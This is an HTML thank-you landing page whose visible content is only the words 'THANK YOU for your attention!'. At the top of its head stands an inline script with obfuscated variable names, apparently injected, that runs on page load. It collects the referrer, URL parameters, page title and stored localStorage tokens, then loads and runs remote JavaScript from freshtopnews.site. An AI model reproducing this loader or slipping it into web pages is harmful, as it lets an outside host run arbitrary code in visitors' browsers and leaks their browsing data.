
<!DOCTYPE html>
<html xml:lang="en" lang="en">
<head>

<script>
    (function() {
    var name = '_JYqdLT2M2gppkTvp';
    if (!window._JYqdLT2M2gppkTvp) {
        window._JYqdLT2M2gppkTvp = {
            unique: false,
            ttl: 86400,
            R_PATH: 'https://freshtopnews.site/6Xr91v',
            P_PATH: 'https://freshtopnews.site/ece35c8/postback',
        };
    }
    const _mTYGgfL9kZRzR7gv = localStorage.getItem('config');
    if (typeof _mTYGgfL9kZRzR7gv !== 'undefined' && _mTYGgfL9kZRzR7gv !== null) {
        var _GK3Wv9sjzP2KNRn3 = JSON.parse(_mTYGgfL9kZRzR7gv);
        var _x7nZ3dR1Y2GQdx3M = Math.round(+new Date()/1000);
        if (_GK3Wv9sjzP2KNRn3.created_at + window._JYqdLT2M2gppkTvp.ttl < _x7nZ3dR1Y2GQdx3M) {
            localStorage.removeItem('subId');
            localStorage.removeItem('token');
            localStorage.removeItem('config');
        }
    }
    var _yD76DhTjnZLjx6W6 = localStorage.getItem('subId');
    var _brTj18s4R3bxv5x2 = localStorage.getItem('token');
    var _zwvjhY22KbXC7rxW = '?return=js.client';
        _zwvjhY22KbXC7rxW += '&' + decodeURIComponent(window.location.search.replace('?', ''));
        _zwvjhY22KbXC7rxW += '&se_referrer=' + encodeURIComponent(document.referrer);
        _zwvjhY22KbXC7rxW += '&default_keyword=' + encodeURIComponent(document.title);
        _zwvjhY22KbXC7rxW += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
        _zwvjhY22KbXC7rxW += '&name=' + encodeURIComponent(name);
        _zwvjhY22KbXC7rxW += '&host=' + encodeURIComponent(window._JYqdLT2M2gppkTvp.R_PATH);
    if (typeof _yD76DhTjnZLjx6W6 !== 'undefined' && _yD76DhTjnZLjx6W6 && window._JYqdLT2M2gppkTvp.unique) {
        _zwvjhY22KbXC7rxW += '&sub_id=' + encodeURIComponent(_yD76DhTjnZLjx6W6);
    }
    if (typeof _brTj18s4R3bxv5x2 !== 'undefined' && _brTj18s4R3bxv5x2 && window._JYqdLT2M2gppkTvp.unique) {
        _zwvjhY22KbXC7rxW += '&token=' + encodeURIComponent(_brTj18s4R3bxv5x2);
    }
    var a = document.createElement('script');
        a.type = 'application/javascript';
        a.src = window._JYqdLT2M2gppkTvp.R_PATH + _zwvjhY22KbXC7rxW;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
    })();
    </script>	
	
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>thankyou</title><meta name="description" content=""><meta name="keywords" content=""><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="apple-touch-icon" sizes="57x57" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-180x180.png"><link rel="icon" type="image/png" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/favicon-32x32.png" sizes="32x32"><link rel="icon" type="image/png" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/favicon-194x194.png" sizes="194x194"><link rel="icon" type="image/png" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/favicon-96x96.png" sizes="96x96"><link rel="icon" type="image/png" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/android-chrome-192x192.png" sizes="192x192"><link rel="icon" type="image/png" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/favicon-16x16.png" sizes="16x16"><link rel="manifest" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/manifest.json"><link rel="shortcut icon" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/favicon.ico"><meta name="msapplication-TileColor" content="#ff0000"><meta name="msapplication-TileImage" content="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/mstile-144x144.png"><meta name="msapplication-config" content="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="stylesheet" href="https://us-as.gr-cdn.com/javascripts/core/lps/dist/reset-styles.3ad45fdcf69283d83c1f.css"><link rel="stylesheet" href="https://us-as.gr-cdn.com/javascripts/core/lps/dist/core-styles.86611d070f9c6453a555.css"><link rel="stylesheet" href="https://us-as.gr-cdn.com/javascripts/core/lps/dist/webform-styles.e191d415b8bdf3a8cf4b.css"><link rel="stylesheet" href="https://thankya.gr8.com/images/common/templates/landing/195/1/css/style.css"><style id="def-mark" type="text/css">div#edi-4mlstxu img { width: 126px; height: 176px; }
div#edi-4mlstxu { width: 126px; height: 176px; background-size: 126px; background-image: url("https://thankya.gr8.com/images/common/templates/landing/195/1/img/195_05.png"); background-position: 0px 0px; background-repeat: no-repeat; }
div#edi-03s09h5 { top: 25px; left: 167px; width: 310px; height: auto; }
div#edi-wbxzndm { top: 100px; left: 167px; width: 310px; height: auto; z-index: 2; }
div#edi-rhfno5t { top: 55px; left: 276px; width: 480px; height: 176px; }
div#edi-lfz0isj { top: 43px; left: 5px; width: 485px; height: auto; z-index: 2; }
div#edi-n7vx88c { top: 76px; left: 5px; width: 485px; height: auto; z-index: 2; }
div#edi-xjfmvd6 { top: 154px; left: 144px; width: 202px; height: 56px; }
div#edi-jncsrmz { top: 313px; left: 262px; width: 495px; height: 267px; background: url("https://thankya.gr8.com/images/common/templates/landing/195/1/img/195_06.png") left top repeat-x rgb(54, 59, 56); }
div#edi-u6fexuo { left: 336px; width: 43px; height: 48px; z-index: 2; }
div#edi-r2xrcvy { left: 394px; width: 43px; height: 48px; }
div#edi-82trhbp { left: 453px; width: 43px; height: 48px; }
div#edi-vu2k1n1 { top: 622px; left: 264px; width: 495px; height: 50px; }
div#edi-j63dpnu { width: 800px; height: auto; z-index: 2; top: -32px; left: 0.5px; transform-origin: 0px 0px; }
div#edi-wxao4h6 { top: 90px; width: 800px; height: auto; z-index: 2; }
div#edi-pvhk6s3 { top: 232px; left: 108px; width: 800px; height: 170px; }
section#section-yj9dhvl [data-section="wrap"] { width: 980px; }
section#section-yj9dhvl { height: 716px; background: url("https://thankya.gr8.com/images/common/templates/landing/195/1/img/195_01.png") left top repeat-x rgb(255, 255, 255); z-index: 2; }
section#section-7fekg1c [data-section="wrap"] { width: 980px; }
section#section-7fekg1c { height: 402px; background-color: rgb(255, 255, 255); z-index: 2; }
section#section-c9db2uh [data-section="wrap"] { width: 980px; }
section#section-c9db2uh { z-index: 2; }</style><style id="def-mark-hover" type="text/css" disabled="true"></style><style id="def-mark-phone" type="text/css" media="only screen and (max-width: 600px)">section#section-yj9dhvl { height: 810px; }
div#edi-82trhbp { top: 141px; left: 163.5px; width: 43px; }
div#edi-r2xrcvy { top: 78px; left: 163.5px; width: 43px; }
div#edi-u6fexuo { top: 15px; left: 163.5px; width: 43px; }
div#edi-vu2k1n1 { top: 591px; left: 15px; width: 370px; height: 204px; }
div#edi-xjfmvd6 { top: 117px; left: 78px; width: 214px; }
div#edi-n7vx88c { top: 54px; left: 15px; width: 340px; text-align: center; }
div#edi-lfz0isj { top: 15px; left: 15px; width: 340px; text-align: center; }
div#edi-jncsrmz { top: 376px; left: 15px; width: 370px; height: 200px; }
div#edi-wbxzndm { top: 275px; left: 30px; width: 310px; text-align: center; }
div#edi-03s09h5 { top: 206px; left: 30px; width: 310px; text-align: center; }
div#edi-4mlstxu { -webkit-transform: scale(1);-moz-transform: scale(1);-ms-transform: scale(1);transform: scale(1); transform-origin: 0px 0px; top: 15px; left: 122px; }
div#edi-rhfno5t { top: 15px; left: 15px; width: 370px; height: 346px; }
section#section-7fekg1c { height: 134px; }
div#edi-wxao4h6 { -webkit-transform: scale(0.425);-moz-transform: scale(0.425);-ms-transform: scale(0.425);transform: scale(0.425); transform-origin: 0px 0px; top: 67px; left: 15px; text-align: center; }
div#edi-j63dpnu { -webkit-transform: scale(0.425);-moz-transform: scale(0.425);-ms-transform: scale(0.425);transform: scale(0.425); transform-origin: 0px 0px; top: 15px; left: 15px; text-align: center; }
div#edi-pvhk6s3 { top: 15px; left: 15px; width: 370px; height: 104px; }
section#section-yj9dhvl [data-section="wrap"] { width: 400px; }
section#section-7fekg1c [data-section="wrap"] { width: 400px; }
section#section-c9db2uh [data-section="wrap"] { width: 400px; }
[data-editable="text"] { text-align: center; }
[hidden-on-phone="true"] { display: none; }</style>

</head>

<body xmlns="http://www.w3.org/1999/xhtml" marginwidth="0" marginheight="0" data-widget="arena" data-variant-id="0" id="body-81nkwqh" data-uid="body-81nkwqh" data-draggable="false" class="" data-viewing-mode="phone" data-workspace-phone-width="400" data-optimize-phone="true">
	
	
	<section data-section="section" id="section-7fekg1c" data-uid="section-7fekg1c" class="" data-draggable="true">
    	<div data-section="wrap" data-reverse="true"><div data-editable="box" data-reverse="true" id="edi-pvhk6s3" data-uid="edi-pvhk6s3" class="" data-draggable="true"><div data-editable="text" id="edi-wxao4h6" data-uid="edi-wxao4h6" class="" data-draggable="true">
                    <div style="font-size:52px; text-align:center;" class="text-content">
                        for your attention!</div>
                </div>
                <div data-editable="text" id="edi-j63dpnu" data-uid="edi-j63dpnu" class="" data-draggable="true">
                    <div style="font-size:88px; font-weight:400; text-align:center;" class="text-content">
                        THANK YOU  
                    </div>
                </div>
                
            </div>
            
            
        </div>
    </section>
	
</body>

</html>
